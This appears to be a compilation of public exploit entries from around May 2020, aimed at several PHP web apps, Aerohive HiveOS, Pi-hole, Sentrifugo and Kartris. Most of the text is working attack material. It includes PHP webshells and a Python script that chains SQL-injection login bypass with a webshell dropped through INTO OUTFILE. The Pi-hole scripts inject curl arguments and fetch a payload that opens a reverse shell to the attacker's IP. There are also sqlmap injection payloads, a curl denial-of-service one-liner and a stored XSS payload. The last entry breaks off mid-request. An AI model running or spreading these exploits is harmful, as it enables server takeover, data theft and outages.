-
Online Clothing Store 1.0 - Arbitrary File Upload
# Exploit Title: Online Clothing Store 1.0 - Arbitrary File Upload # Date: 2020-05-05 # Exploit Author: Sushant Kamble and Saurav Shukla # Vendor Homepage: https://www.sourcecodester.com/php/14185/online-clothing-store.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-clothing-store_0.zip # Version: 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 # Vulnerable Page: Products.php # Exploit: Open Products.php and select any product. Fill in the details. Create a PHP shell with the following script: <?php echo shell_exec($_GET['e'].' 2>&1'); ?> Click on "Upload Image", select the .php file and click Submit. The image upload accepts the .php file and stores it under /Products/ inside the web root, so it is served back as executable PHP. Access the URL below: http://localhost/online%20Clothing%20Store/Products/shell.php?e=dir and put the system command to execute in the `e` parameter (the ` 2>&1` in the shell appends stderr to the returned output).
-
Pisay Online E-Learning System 1.0 - Remote Code Execution
# Exploit Title: Pisay Online E-Learning System 1.0 - Remote Code Execution # Exploit Author: Bobby Cooke # Date: 2020-05-05 # Vendor Homepage: https://www.sourcecodester.com/php/14192/pisay-online-e-learning-system-using-phpmysql.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/e-learningsystem_0.zip # Version: 1.0 # Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4 # Description: Pisay Online E-Learning System v1.0 - SQLi Auth Bypass + Remote Code Execution (RCE) # Vulnerable Source Code: # /e-learningsystem/admin/login.php # 121 $email = trim($_POST['user_email']); # 122 $upass = trim($_POST['user_pass']); # 123 $h_upass = sha1($upass); # 132 $user = new User(); # 134 $res = $user::userAuthentication($email, $h_upass); # /e-learningsystem/include/accounts.php # 3 class User { # 23 static function userAuthentication($email,$h_pass){ # 25 $mydb->setQuery("SELECT * FROM `tblusers` WHERE `UEMAIL` = '". $email ."' and `PASS` = '". $h_pass ."'"); # /e-learningsystem/admin/modules/lesson/edit.php # 6 @$id = $_GET['id']; # 7 if($id==''){ # 10 $lesson = New Lesson(); # 11 $res = $lesson->single_lesson($id); # /e-learningsystem/include/lessons.php # 4 class Lesson { # 5 protected static $tblname = "tbllesson"; # 35 function single_lesson($id=0){ # 37-38 $mydb->setQuery("SELECT * FROM ".self::$tblname." 
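# Where LessonID= '{$id}' LIMIT 1");

from __future__ import print_function

import re
import sys

import requests

# The target typically runs with a self-signed certificate; silence the
# InsecureRequestWarning that every verify=False request would otherwise emit.
requests.packages.urllib3.disable_warnings(
    requests.packages.urllib3.exceptions.InsecureRequestWarning)

# Python 2/3 compatibility: the original script targets Python 2 (raw_input,
# print statement); this keeps it runnable on both interpreters.
try:
    _read_line = raw_input  # noqa: F821 (Python 2 only)
except NameError:
    _read_line = input


def webshell(SERVER_URL, session=None):
    """Interactive loop that relays commands to the dropped webshell.

    Args:
        SERVER_URL: base URL of the application, with a trailing slash, e.g.
            'https://10.0.0.3:443/e-learningsystem/'.
        session: requests.Session to use; defaults to the module-level
            session ``s`` created in the main block (the original behavior).

    Returns nothing; exits the process on Ctrl-C / EOF or on a request error.
    """
    sess = session if session is not None else s
    # The webshell is written to the XAMPP document root, so the URL walks up
    # from the application directory; the web server normalises the '../'.
    shell_url = SERVER_URL + '../../../../webshell.php'
    try:
        while True:
            cmd = _read_line('C:\\ ')
            r2 = sess.get(shell_url, params={'cmd': cmd}, verify=False)
            # Strip the UNION padding markers that surround the shell output.
            clean = r2.text.replace('AAAAAAAAAAAAAAA', '').replace('313371337', '')
            print(clean)
    except (KeyboardInterrupt, EOFError):
        print("\r\nExiting.")
        sys.exit(-1)
    except requests.RequestException as exc:
        # The original bare 'except:' hid the reason; show it before exiting.
        print("\r\n(-) Request failed: %s" % exc)
        sys.exit(-1)


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("(+) Usage: %s <SERVER_URL>" % sys.argv[0])
        print("(+) Example: %s 'https://10.0.0.3:443/e-learningsystem/'" % sys.argv[0])
        sys.exit(-1)

    SERVER_URL = sys.argv[1]
    ADMIN_URL = SERVER_URL + 'admin/login.php'
    LESSON_URL = SERVER_URL + 'admin/modules/lesson/index.php'

    s = requests.Session()
    s.get(SERVER_URL, verify=False)

    # Step 1: SQLi authentication bypass in admin/login.php (user_email is
    # concatenated straight into the query, see the source excerpt above).
    payload1 = {'user_email': "boku' OR 1337=1337 LIMIT 1 -- PowerUp",
                'user_pass': 'InstantTransmission',
                'btnLogin': ''}
    s.post(ADMIN_URL, data=payload1, verify=False)

    # Step 2: UNION-based SQLi in the lesson editor reflects @@datadir into
    # the "Title" input, which tells us where XAMPP lives on disk.
    payload2 = {'view': 'edit',
                'id': '31337\' AND 1337=31337 union all select 313371337,"AAAAAAAAAAAAAAA",@@datadir,"AAAAAAAAAAAAAAA","AAAAAAAAAAAAAAA" -- kamahamaha'}
    r1 = s.get(LESSON_URL, params=payload2, verify=False)

    match = re.search(r'"Title" type="text" value="([^"]*)"', r1.text)
    if match is None:
        # The original silently continued with '[]' as the path when the
        # value was missing; fail loudly so the operator knows the auth
        # bypass or the UNION injection did not land.
        print("(-) Could not read @@datadir from the lesson edit form; "
              "auth bypass or UNION injection failed.")
        sys.exit(-1)
    # e.g. C:\xampp\mysql\data\  ->  C:/xampp/mysql/data/  ->  C:/xampp
    dataPath = match.group(1).replace('\\', '/')
    xamppPath = re.sub('xampp.*', 'xampp', dataPath)

    # Step 3: INTO OUTFILE drops a PHP webshell into htdocs. This needs the
    # MySQL FILE privilege on the DB account the app uses; the XAMPP setup in
    # the header evidently grants it -- verify on other deployments.
    payload3 = {'view': 'edit',
                'id': '31337\' AND 1337=31337 union all select 313371337,"AAAAAAAAAAAAAAA","<?php echo shell_exec($_GET[\'cmd\']);?>","AAAAAAAAAAAAAAA","AAAAAAAAAAAAAAA" into OUTFILE \'' + xamppPath + '/htdocs/webshell.php\' -- kamahamaha'}
    print(payload3)
    s.get(LESSON_URL, params=payload3, verify=False)

    webshell(SERVER_URL)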
-
Online AgroCulture Farm Management System 1.0 - 'pid' SQL Injection
# Exploit Title: Online AgroCulture Farm Management System 1.0 - 'pid' SQL Injection # Google Dork: N/A # Date: 2020-05-07 # Exploit Author: BKpatron # Vendor Homepage: https://www.sourcecodester.com/php/14198/online-agroculture-farm-management-system-phpmysql.html # Software Link: https://www.sourcecodester.com/download-code?nid=14198&title=Online+AgroCulture+Farm+Management+System+in+PHP%2FMySQL # Version: v1.0 # Tested on: Win 10 # CVE: N/A # my website: bkpatron.com # Description: The Online AgroCulture Farm Management System v1.0 application is vulnerable to SQL injection via the 'pid' parameter on the review.php page. # Vulnerable file: review.php http://localhost/AgroCulture/review.php?pid=27 The following are the reported injection points (sqlmap-style output): Parameter: pid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pid=27' AND 5853=5853 AND 'EmvW'='EmvW Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: pid=27' AND (SELECT 9739 FROM(SELECT COUNT(*),CONCAT(0x7170627071,(SELECT (ELT(9739=9739,1))),0x7176626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'tpnl'='tpnl Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: pid=27' AND (SELECT 7650 FROM (SELECT(SLEEP(5)))bwDl) AND 'IWff'='IWff Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: pid=-6157' UNION ALL SELECT NULL,NULL,CONCAT(0x7170627071,0x6d7a6346644349635a495a424c56644c51666866664553794e674764546a6c67747a69634749516a,0x7176626a71),NULL,NULL,NULL,NULL,NULL-- RXWN [INFO] the back-end DBMS is MySQL web application technology: PHP, Apache 2.4.39, PHP 7.2.18 back-end DBMS: MySQL >= 5.0 # Proof of Concept: http://localhost/vulnerability/ncn/AgroCulture/review.php?pid=sqli GET AgroCulture/review.php?pid=27 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie:PHPSESSID=gd27cb23t7m8o57giuvh0f8e7m Connection: keep-alive Upgrade-Insecure-Requests: 1 pid=-6157%27%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7170627071,0x6d7a6346644349635a495a424c56644c51666866664553794e674764546a6c67747a69634749516a,0x7176626a71),NULL,NULL,NULL,NULL,NULL--%20RXWN
-
Extreme Networks Aerohive HiveOS 11.0 - Remote Denial of Service (PoC)
# Exploit title : Extreme Networks Aerohive HiveOS 11.0 - Remote Denial of Service (PoC) # Exploit Author : LiquidWorm # Date : 2020-05-06 # Vendor: Extreme Networks # Product web page: https://www.extremenetworks.com # Datasheet: https://www.aerohive.com/wp-content/uploads/Aerohive_Datasheet_HiveOS.pdf # Affected version: <=11.x #!/bin/bash # # # Extreme Networks Aerohive HiveOS <=11.x Remote Denial of Service Exploit # # # Vendor: Extreme Networks # Product web page: https://www.extremenetworks.com # Datasheet: https://www.aerohive.com/wp-content/uploads/Aerohive_Datasheet_HiveOS.pdf # Affected version: <=11.x # # Summary: Aerohive HiveOS is the network operating system that powers # all Aerohive access points, based on a feature-rich Cooperative Control # architecture. HiveOS enables Aerohive devices to organize into groups, # or 'hives', which allows functionality like fast roaming, user-based # access control and fully stateful application-aware firewall policies, # as well as additional security and RF networking features - all without # the need for a centralized or dedicated controller. # # Desc: An unauthenticated malicious user can trigger a Denial of Service # (DoS) attack when sending specific application layer packets towards the # Aerohive NetConfig UI. This PoC exploit renders the application unusable # for 305 seconds or 5 minutes with a single HTTP request using the action.php5 # script calling the CliWindow function thru the _page parameter, denying # access to the web server hive user interface. 
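#
# Vendor mitigation:
#   CLI> no system web-server hive-ui enable
#
# Tested on: Hiawatha v9.6
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                       @zeroscience
#
#
# Advisory ID: ZSL-2020-5566
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5566.php
#
#
# 05.12.2019
#

# Exactly one argument (target IP or hostname) is required. Print the usage
# to stderr and exit non-zero so a wrapper script can tell misuse from a run.
if [ "$#" -ne 1 ]; then
  echo -ne "\nUsage: $0 [ipaddr]\n\n" >&2
  exit 1
fi

IP=$1

# Request path that triggers the hang. The original PoC assembled this from
# escaped hex bytes (\x61\x63\x74...); decoded, it is exactly the string
# below, spelled out here so the trigger is reviewable and greppable.
SBYTES='action.php5?_page=CliWindow&_action=get&_actionType=1'

# A single unauthenticated GET is enough; -k because the HiveOS UI usually
# presents a self-signed certificate. Per the advisory the NetConfig UI then
# stays unresponsive for about 305 seconds.
curl -vk "https://$IP/$SBYTES" --user-agent "Profesorke/Dzvoneshe"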
-
Pi-hole < 4.4 - Authenticated Remote Code Execution
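#!/usr/bin/env python3
# Pi-hole <= 4.4 RCE
# Author: Nick Frichette
# Homepage: https://frichetten.com
#
# Note: This exploit must be run with root privileges and port 80 must not be occupied.
# While it is possible to exploit this from a non standard port, for the sake of
# simplicity (and not having to modify the payload) please run it with sudo privileges.
# Or setup socat and route it through there?
#
# How it works (as implemented below): the "newuserlists" value saved on the
# blocklists settings page ends up in gravity's curl invocation, so a value of
#   http://<attacker>#" -o fun.php -d "
# injects extra curl arguments and makes gravity write whatever our HTTP
# listener answers into fun.php in the admin scripts directory. The first
# gravity run stores the stager, the second fetches the PHP payload into that
# file; requesting fun.php then executes it.

import re
import socket
import sys
import _thread
import time

import requests

USAGE = ("[-] Usage: sudo ./cve.py *Session Cookie* *URL of Target* *Your IP* *R Shell Port*\n"
         "\nThis script will take 4 parameters:\n"
         "  Session Cookie: The authenticated session token.\n"
         "  URL of Target: The target's url, example: http://192.168.1.10\n"
         "  Your IP: The IP address of the listening machine.\n"
         "  Reverse Shell Port: The listening port for your reverse shell.")

# Payload taken from http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
# I opted to use the Python3 reverse shell one liner over the full PHP reverse shell.
PAYLOAD_TEMPLATE = """<?php shell_exec("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"%s\\\",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\"/bin/sh\\",\\"-i\\"]);'") ?> """

# Same attribute order the original fixed-offset slice relied on.
TOKEN_RE = re.compile(r'name="token"\s+value="([^"]+)"')


def _extract_token(html):
    """Return the CSRF token from the settings page markup, or None if absent."""
    match = TOKEN_RE.search(html)
    return match.group(1) if match else None


def _listen(local_ip):
    """Bind and listen on local_ip:80 before the target is told to call back.

    Binding in the caller's thread removes the race between starting the
    accept thread and triggering gravity. SO_REUSEADDR lets the second
    listener rebind port 80 while the first callback's connection may still
    be in TIME_WAIT (without it that bind can fail with EADDRINUSE).
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind((local_ip, 80))
    sock.listen(5)
    return sock


def send_response(thread_name, sock, payload):
    """Accept one callback from gravity's curl on `sock` and answer it.

    "T1": reply with a minimal 200 response (the stager run).
    Anything else: reply with the PHP payload body, which curl saves as fun.php.
    The listening socket is closed in every case.
    """
    try:
        conn, _addr = sock.accept()
        with conn:
            if thread_name == "T1":
                print("[+] Received First Callback")
                conn.sendall(b"HTTP/1.1 200 OK\n\nstuff\n")
            else:
                print("[+] Received Second Callback")
                print("[+] Uploading Payload")
                conn.sendall(bytes(payload, "utf-8"))
    finally:
        sock.close()


def main(argv):
    # argv[0] is the script, so four parameters need five entries; the original
    # checked "< 4" and crashed with IndexError on argv[4] when one was missing.
    if len(argv) < 5:
        print(USAGE)
        return 1

    session = dict(PHPSESSID=argv[1])
    target = argv[2]
    local_ip = argv[3]
    local_port = argv[4]

    # Suppress https verify warnings; assuming some instances use self-signed certs.
    requests.packages.urllib3.disable_warnings()

    payload = PAYLOAD_TEMPLATE % (local_ip, local_port)
    settings_url = target + "/admin/settings.php?tab=blocklists"
    gravity_url = target + "/admin/scripts/pi-hole/php/gravity.sh.php"

    # Fetch token
    resp = requests.get(settings_url, cookies=session, verify=False)
    token = _extract_token(resp.text)
    if token is None:
        print("[-] Could not find the CSRF token on the blocklists page; is the session cookie valid?")
        return 1

    listener = _listen(local_ip)
    _thread.start_new_thread(send_response, ("T1", listener, payload))

    # Make request with token; the URL fragment smuggles extra curl arguments.
    data = {"newuserlists": "http://" + local_ip + "#\" -o fun.php -d \"",
            "field": "adlists", "token": token, "submit": "saveupdate"}
    resp = requests.post(settings_url, cookies=session, data=data, verify=False)
    if resp.status_code == 200:
        print("[+] Put Stager Success")
    else:
        print("[-] Stager request returned HTTP %s" % resp.status_code)

    # Update gravity
    requests.get(gravity_url, cookies=session, verify=False)
    time.sleep(3)

    listener = _listen(local_ip)
    _thread.start_new_thread(send_response, ("T2", listener, payload))

    # Update again to trigger upload
    requests.get(gravity_url, cookies=session, verify=False)

    print("[+] Triggering Exploit")
    try:
        # The payload blocks while the reverse shell lives, so a timeout is expected.
        requests.get(target + "/admin/scripts/pi-hole/php/fun.php", cookies=session, timeout=3, verify=False)
    except requests.RequestException:
        # We should be silent to avoid filling the cli window
        pass
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))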
-
Pi-hole < 4.4 - Authenticated Remote Code Execution / Privileges Escalation
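#!/usr/bin/env python3
# Pi-hole <= 4.4 RCE
# Author: Nick Frichette
# Homepage: https://frichetten.com
#
# Note: This exploit must be run with root privileges and port 80 must not be occupied.
# While it is possible to exploit this from a non standard port, for the sake of
# simplicity (and not having to modify the payload) please run it with sudo privileges.
# Or setup socat and route it through there?
#
# Flow (as implemented below): the "newuserlists" value saved on the blocklists
# settings page ends up in gravity's curl invocation, so the value
#   http://<attacker>#" -o <file>.php -d "
# injects extra curl arguments and our HTTP listener controls what curl writes
# into that file. Two gravity runs drop fun.php (which runs `sudo pihole -a -t`),
# two more drop teleporter.php holding the reverse shell; requesting fun.php
# then starts the chain. That `pihole -a -t` ends up executing teleporter.php
# as root is assumed from the exploit's naming and is not visible in this
# script -- confirm against the Pi-hole source if it fails.

import re
import socket
import sys
import _thread
import time

import requests

USAGE = ("[-] Usage: sudo ./cve.py *Session Cookie* *URL of Target* *Your IP* *R Shell Port*\n"
         "\nThis script will take 4 parameters:\n"
         "  Session Cookie: The authenticated session token.\n"
         "  URL of Target: The target's url, example: http://192.168.1.10\n"
         "  Your IP: The IP address of the listening machine.\n"
         "  Reverse Shell Port: The listening port for your reverse shell.")

# Payload taken from http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
# I opted to use the Python3 reverse shell one liner over the full PHP reverse shell.
SHELL_PAYLOAD_TEMPLATE = """<?php shell_exec("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"%s\\\",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\"/bin/sh\\",\\"-i\\"]);'") ?> """

ROOT_PAYLOAD = """<?php shell_exec("sudo pihole -a -t") ?> """

# Same attribute order the original fixed-offset slice relied on.
TOKEN_RE = re.compile(r'name="token"\s+value="([^"]+)"')


def _extract_token(html):
    """Return the CSRF token from the settings page markup, or None if absent."""
    match = TOKEN_RE.search(html)
    return match.group(1) if match else None


def _listen(local_ip):
    """Bind and listen on local_ip:80 before the target is told to call back.

    Binding in the caller's thread removes the race between starting the
    accept thread and triggering gravity. SO_REUSEADDR lets later listeners
    rebind port 80 while an earlier callback's connection may still be in
    TIME_WAIT (without it that bind can fail with EADDRINUSE).
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind((local_ip, 80))
    sock.listen(5)
    return sock


def send_response(thread_name, sock, root_payload, shell_payload):
    """Accept one callback from gravity's curl on `sock` and answer it.

    "T1"/"T3": reply with a minimal 200 response (stager runs).
    "T2": reply with the root payload (written to fun.php).
    anything else: reply with the shell payload (written to teleporter.php).
    The listening socket is closed in every case.
    """
    try:
        conn, _addr = sock.accept()
        with conn:
            if thread_name == "T1":
                print("[+] Received First Callback")
                conn.sendall(b"HTTP/1.1 200 OK\n\nstuff\n")
            elif thread_name == "T2":
                print("[+] Received Second Callback")
                print("[+] Uploading Root Payload")
                conn.sendall(bytes(root_payload, "utf-8"))
            elif thread_name == "T3":
                print("[+] Received Third Callback")
                conn.sendall(b"HTTP/1.1 200 OK\n\nstuff\n")
            else:
                print("[+] Received Fourth Callback")
                print("[+] Uploading Shell Payload")
                conn.sendall(bytes(shell_payload, "utf-8"))
    finally:
        sock.close()


def main(argv):
    # argv[0] is the script, so four parameters need five entries; the original
    # checked "< 4" and crashed with IndexError on argv[4] when one was missing.
    if len(argv) < 5:
        print(USAGE)
        return 1

    session = dict(PHPSESSID=argv[1])
    target = argv[2]
    local_ip = argv[3]
    local_port = argv[4]

    # Suppress https verify warnings; assuming some instances use self-signed certs.
    requests.packages.urllib3.disable_warnings()

    shell_payload = SHELL_PAYLOAD_TEMPLATE % (local_ip, local_port)
    root_payload = ROOT_PAYLOAD
    callback_args = (root_payload, shell_payload)

    settings_url = target + "/admin/settings.php?tab=blocklists"
    gravity_url = target + "/admin/scripts/pi-hole/php/gravity.sh.php"

    # Fetch token
    resp = requests.get(settings_url, cookies=session, verify=False)
    token = _extract_token(resp.text)
    if token is None:
        print("[-] Could not find the CSRF token on the blocklists page; is the session cookie valid?")
        return 1

    # Stage 1: fun.php <- root payload (callbacks T1 and T2).
    listener = _listen(local_ip)
    _thread.start_new_thread(send_response, ("T1", listener) + callback_args)

    # Make request with token; the URL fragment smuggles extra curl arguments.
    data = {"newuserlists": "http://" + local_ip + "#\" -o fun.php -d \"",
            "field": "adlists", "token": token, "submit": "saveupdate"}
    resp = requests.post(settings_url, cookies=session, data=data, verify=False)
    if resp.status_code == 200:
        print("[+] Put Root Stager Success")
    else:
        print("[-] Root stager request returned HTTP %s" % resp.status_code)

    # Update gravity
    requests.get(gravity_url, cookies=session, verify=False)
    time.sleep(3)

    listener = _listen(local_ip)
    _thread.start_new_thread(send_response, ("T2", listener) + callback_args)

    # Update again to trigger upload of root redirect
    requests.get(gravity_url, cookies=session, verify=False)
    time.sleep(1)

    # Stage 2: teleporter.php <- shell payload (callbacks T3 and T4).
    listener = _listen(local_ip)
    _thread.start_new_thread(send_response, ("T3", listener) + callback_args)

    data = {"newuserlists": "http://" + local_ip + "#\" -o teleporter.php -d \"",
            "field": "adlists", "token": token, "submit": "saveupdate"}
    resp = requests.post(settings_url, cookies=session, data=data, verify=False)
    if resp.status_code == 200:
        print("[+] Put Shell Stager Success")
    else:
        print("[-] Shell stager request returned HTTP %s" % resp.status_code)

    requests.get(gravity_url, cookies=session, verify=False)
    time.sleep(1)

    listener = _listen(local_ip)
    _thread.start_new_thread(send_response, ("T4", listener) + callback_args)

    requests.get(gravity_url, cookies=session, verify=False)

    print("[+] Triggering Exploit")
    try:
        # The chain blocks while the reverse shell lives, so a timeout is expected.
        requests.get(target + "/admin/scripts/pi-hole/php/fun.php", cookies=session, timeout=3, verify=False)
    except requests.RequestException:
        # We should be silent to avoid filling the cli window
        pass
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))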
-
Online AgroCulture Farm Management System 1.0 - 'uname' SQL Injection
# Exploit Title: Online AgroCulture Farm Management System 1.0 - 'uname' SQL Injection # Date: 2020-05-06 # Exploit Author: Tarun Sehgal # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/farm_management_system_in_php_with_source_code.zip # Version: 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 --------------------------------------------------------------------------------- #parameter Vulnerable: uname # Injected Request #Below request will print database name and MariaDB version. POST /fms/Login/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 204 Origin: http://localhost Connection: close Referer: http://localhost/fms/index.php Cookie: PHPSESSID=fiiiu7pq9kvhdr770ahd7dejco Upgrade-Insecure-Requests: 1 uname=admin' OR (SELECT 1935 FROM(SELECT COUNT(*),CONCAT(database(),(SELECT (ELT(1935=1935,1))),0x3a,version(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- dqgD&pass=admin&category=1 ----------------------------------------------------------------------------------------------------------------------------- #Response HTTP/1.1 302 Found Date: Wed, 06 May 2020 13:21:36 GMT Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.5 X-Powered-By: PHP/7.4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache location: error.php Content-Length: 356 Connection: close Content-Type: text/html; charset=UTF-8 <b>Warning</b>: mysqli_query(): (23000/1062): Duplicate entry 'agroculture1:10.4.11-MariaDB1' for key 'group_key' in <b>
-
Sentrifugo CMS 3.2 - Persistent Cross-Site Scripting
# Exploit Title: Sentrifugo CMS 3.2 - Persistent Cross-Site Scripting # Dork: N/A # Date: 2020-05-06 # Exploit Author: Vulnerability-Lab # Vendor: http://www.sentrifugo.com/ # Link: http://www.sentrifugo.com/download # Version: 3.2 # Category: Webapps # CVE: N/A Document Title: =============== Sentrifugo v3.2 CMS - Persistent XSS Web Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2229 Product & Service Introduction: =============================== http://www.sentrifugo.com/ http://www.sentrifugo.com/download Affected Product(s): ==================== Sentrifugo Product: Sentrifugo v3.2 - CMS (Web-Application) Vulnerability Disclosure Timeline: ================================== 2020-05-05: Public Disclosure (Vulnerability Laboratory) Technical Details & Description: ================================ A persistent input validation web vulnerability has been discovered in the official Sentrifugo v3.2 CMS web-application. The vulnerability allows remote attackers to inject their own persistent malicious script code, which the application then serves to the browsers of other users. The persistent vulnerability is located in the `expense_name` parameter of the `/expenses/expenses/edit` module in the `index.php` file. Remote attackers with low privileges are able to inject their own persistent malicious script code as an expense entry. The injected code can be used to attack the frontend or backend of the web-application. The request method to inject is POST and the attack vector is located on the application-side. Entries of expenses can be reviewed in the backend by higher privileged accounts as well, so the payload also fires in their sessions. Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. 
Request Method(s): [+] POST Vulnerable Module(s): [+] index.php/expenses/expenses/edit Vulnerable Input(s): [+] Expenses Name Vulnerable File(s): [+] index.php Vulnerable Parameter(s): [+] expense_name Affected Module(s): [+] index.php/expenses/expenses Proof of Concept (PoC): ======================= The persistent web vulnerability can be exploited by a low privileged web application user account with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: Vulnerable Source <div id="maincontentdiv"> <div id="dialog-confirm" style="display:none;"> <div class="newframe-div"> <div class="new-form-ui height32"> <div class="division"> <input type="text" maxlength="12" id="number_value" name="number_value"></div> <span class="errors" id="errors-contactnumber"></span></div></div></div> <div id="empstatus-alert" style="display:none;"> <div class="newframe-div"><div id="empstatusmessage"></div></div></div> <div id="empleaves-alert" style="display:none;"> <div class="newframe-div"><div id="empleavesmessage"></div></div></div> --- PoC Session Logs [POST] --- (Expenses Inject) http://sentrifugo.localhost:8080/index.php/expenses/expenses/edit Host: sentrifugo.localhost:8080 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded Content-Length: 352 Origin: http://sentrifugo.localhost:8080 Connection: keep-alive Referer: http://sentrifugo.localhost:8080/index.php/expenses/expenses/edit Cookie: PHPSESSID=h67jk6dashpvgn5n3buc6uia87; _ga=GA1.2.788961556.1587849443; _gid=GA1.2.1158360779.1587849443 id=&limit=&offset=&parameter=all&currencyid=1&file_original_names=&file_new_names=&last_inserted_receipts=&receiptId=&expense_Id=& expense_name=<img src="evil.source" onload=alert(document.domain)>&category_id=&project_id=&expense_date=&expense_currency_id=2& (note: some renderings of this advisory show `¶meter`/`¤cyid` here because `&para`/`&curren` were decoded as HTML entities; the actual form fields are `parameter` and `currencyid`) 
expense_amount=&cal_amount=0&is_from_advance=&expense_payment_id=&expense_payment_ref_no=&trip_id=&description=&post_receipt_ids=&submit=Save - POST: HTTP/1.1 200 OK Server: Apache/2.2.22 (Ubuntu) X-Powered-By: PHP/5.3.10-1ubuntu3.10 Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 19284 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html Reference(s): http://sentrifugo.localhost:8080/index.php http://sentrifugo.localhost:8080/index.php/expenses http://sentrifugo.localhost:8080/index.php/expenses/expenses/ http://sentrifugo.localhost:8080/index.php/expenses/expenses/edit Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com
-
Kartris 1.6 - Arbitrary File Upload
# Exploit Title: Kartris 1.6 - Arbitrary File Upload # Dork: N/A # Date: 2020-05-08 # Exploit Author: Nhat Ha - Sun CSR # Vendor Homepage: https://www.cactusoft.com/ # Software Link: https://www.kartris.com/ # Version: 1.6 # Category: Webapps # Tested on: WiN10_x64/KaLiLinuX_x64 # CVE: N/A # POC: https://localhost/Admin/_GeneralFiles.aspx # POST /Admin/_GeneralFiles.aspx HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------9604487443072642880454762058 Content-Length: 18484 Origin: 192.168.1.1 Connection: close Referer: https://192.168.1.1/Admin/_GeneralFiles.aspx Cookie: __cfduid=d1e56d596943226c869a1186e06b8d8661588757096; ASP.NET_SessionId=abbnm4jh04wmdbl2gukr5t5w; KartrisBasket870c8=s=7i7lpj21819; KartrisBackAuth870c8=xxxxxxxxxxxxx Upgrade-Insecure-Requests: 1 -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="scrManager_HiddenField" ;;AjaxControlToolkit, Version=4.1.7.123, Culture=neutral, PublicKeyToken=28f01b0e84b6d53e:en-GB:57898466-f347-4e5c-9527-24f201596811:475a4ef5:5546a2b:d2e10b12:effe2a26:37e2e5c9:1d3ed089:751cdd15:dfad98a5:497ef277:a43b07eb:3cf12cf1; -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="_UC_CategoryMenu_tvwCategory_ExpandState" cccccccccc -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="_UC_CategoryMenu_tvwCategory_SelectedNode" -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="_UC_CategoryMenu_tvwCategory_PopulateLog" -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="ctl00$scrManager" 
